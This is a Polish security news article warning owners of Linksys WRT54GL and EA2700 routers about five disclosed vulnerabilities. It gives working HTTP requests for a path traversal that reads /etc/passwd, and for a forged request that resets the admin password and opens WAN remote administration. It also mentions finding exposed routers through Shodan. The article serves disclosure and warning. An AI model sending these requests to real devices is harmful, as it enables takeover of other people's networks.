Uwaga na poważne luki w urządzeniach Linksys!

Niestety mamy kolejny dowód na to, że producenci urządzeń sieciowych klasy SOHO nie przywiązują zbyt dużej uwagi do bezpieczeństwa użytkowników swych produktów. Przed poważnymi podatnościami ostrzegamy dziś właścicieli popularnych modeli routerów Linksys.

Jeśli jesteś posiadaczem routerów Linksys WRT54GL lub EA2700, to Twoja domowa lub firmowa sieć może być poważnie zagrożona. Phil Perviance opublikował właśnie szczegóły pięciu występujących w tych urządzeniach podatności. Spójrzmy.

1. Linksys WRT54GL CSRF/CSFU

URL http://192.168.1.1/upgrade.cgi jest podatny na atak CSRF i pozwala na wykonanie ataku CSFU (ang. Cross-Site File Upload). W praktyce oznacza to potencjalną możliwość podmiany wewnętrznego oprogramowania (firmware) urządzenia i tym samym całkowite przejęcie kontroli nad jego działaniem.

2. Linksys EA2700 XSS

URL http://192.168.1.1/apply.cgi (parametr: submit_button) jest podatny na atak XSS, który zadziała również przy braku uwierzytelnienia. Potencjalne zastosowanie? Uzyskanie dostępu do urządzenia, modyfikacja konfiguracji, podmiana wewnętrznego oprogramowania.

3. Linksys EA2700 File Path Traversal Vulnerability

URL http://192.168.1.1/apply.cgi pozwala na uzyskanie dostępu do lokalnego systemu plików urządzenia. Przekazanie ścieżki do parametru „next_page” pozwala na uzyskanie dostępu do plików urządzenia, poniżej przykład dla pliku /etc/passwd.

POST /apply.cgi
Host: 192.168.1.1
submit_button=Wireless_Basic&change_action=gozila_cgi&next_page=/etc/passwd
====>
root:x:0:0::/:/bin/sh
nobody:x:99:99:Nobody:/:/bin/nologin
sshd:x:22:22::/var/empty:/sbin/nologin
admin:x:1000:1000:Admin User:/tmp/home/admin:/bin/sh
quagga:x:1001:1001:Quagga:/var/empty:/bin/nologin
firewall:x:1002:1002:Firewall:/var/empty:/bin/nologin

4. Linksys EA2700 – modyfikacja hasła

Urządzenie jest na tyle „gościnne”, że każdemu znajdującemu się w tej samej sieci lub dowolnej odpowiednio spreparowanej witrynie internetowej pozwala na… zmianę hasła dostępowego oraz modyfikację konfiguracji. Po przesłaniu poniższego żądania POST hasło zostanie ustawione na „password”, a zdalna administracja (od strony WAN) zostanie włączona:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 370

submit_button=Management&change_action=&action=Apply&PasswdModify=1
&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0
&wait_time=4&http_passwd=password&http_passwdConfirm=password
&_http_enable=1&web_wl_filter=0
&remote_management=1&_remote_mgt_https=1&remote_ip_any=1
&http_wanport=8080&nf_alg_sip=0&ctf_enable=1&upnp_enable=1
&upnp_config=1&upnp_internet_dis=0

5. Linksys EA2700 Source Code Disclosure Vulnerability

Dodanie na końcu dowolnego URL (np. http://192.168.1.1/Management.asp/) znaku „/” pozwala na wyświetlenie kodów źródłowych aplikacji webowej routera. Interesujące.

Linksys Smart Wi-Fi Router EA2700 – dwupasmowy router z obsługą standardu Gigabit

Jeśli ktoś myśli, że odnalezienie urządzeń tego typu za pośrednictwem Internetu jest trudne, ten jest w błędzie. Przykładowo, za pomocą prostego zapytania skierowanego do Shodana, czyli wyszukiwarki urządzeń i serwerów sieciowych, odnajdziemy tysiące routerów.

Również przygotowanie własnej, dowolnie zmodyfikowanej wersji wewnętrznego oprogramowania routera nie jest wcale trudne. W tym celu można skorzystać z dostępnych narzędzi, takich jak:

• firmware-mod-kit,
• wrt-firmware-tools.

Szczegółowe informacje o powyższych podatnościach zostały przesłane do producenta miesiąc temu. Niestety, jak do tej pory Phil nie doczekał się odpowiedzi. Tego typu podatności stanowią poważne zagrożenie, ponieważ mogą posłużyć potencjalnemu intruzowi do uzyskania oraz długoterminowego utrzymania (jak często sprawdzacie konfigurację własnego routera oraz wersję jego oprogramowania wewnętrznego?) kontroli nad naszą domową lub firmową siecią. Znane są również przypadki botnetów, które zamiast na komputerach, żerują właśnie na urządzeniach sieciowych klasy SOHO.

Biorąc pod uwagę powyższe podatności oraz reakcje (a raczej ich brak) producentów na zgłoszenia, bezpieczeństwo użytkowników nie jest dziś priorytetem dla firm produkujących domowe urządzenia sieciowe. Czy waszym zdaniem taki stan rzeczy w najbliższej przyszłości może ulec zmianie?

– Wojciech Smol, (wojciech.smol<at>sekurak.pl)